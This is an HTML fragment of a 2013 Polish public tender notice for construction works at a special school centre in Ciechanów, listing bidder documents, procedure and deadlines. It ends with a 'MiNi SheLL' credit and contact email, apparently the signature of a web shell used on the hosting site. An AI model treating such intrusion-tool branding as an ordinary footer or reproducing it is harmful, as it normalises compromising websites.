2) opłaconej polisy, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej, w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dowód wzniesienia wadium, Zaakceptowany wzór umowy (zał. Nr 7 do SIWZ), Zestawienie elementów scalonych scalonych robót (zał. Nr 9 do SIWZ),  Harmonogram rzeczowo - finansowy - (załącznik Nr  10 do SIWZ)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.soswciechanow.edu.pl    stciechanow.bip.org.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specjalny Ośrodek Szkolno - Wychowawczy ,06-400 Ciechanów, 
ul. Sienkiewicza 13, Sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.05.2013 godzina 09:00, miejsce: Specjalny Ośrodek Szkolno - Wychowawczy ,06-400 Ciechanów, 
ul. Sienkiewicza 13, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Unii Europejskiej w ramach Regionalnego Programu Operacyjnego Województwa Mazowieckiego 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com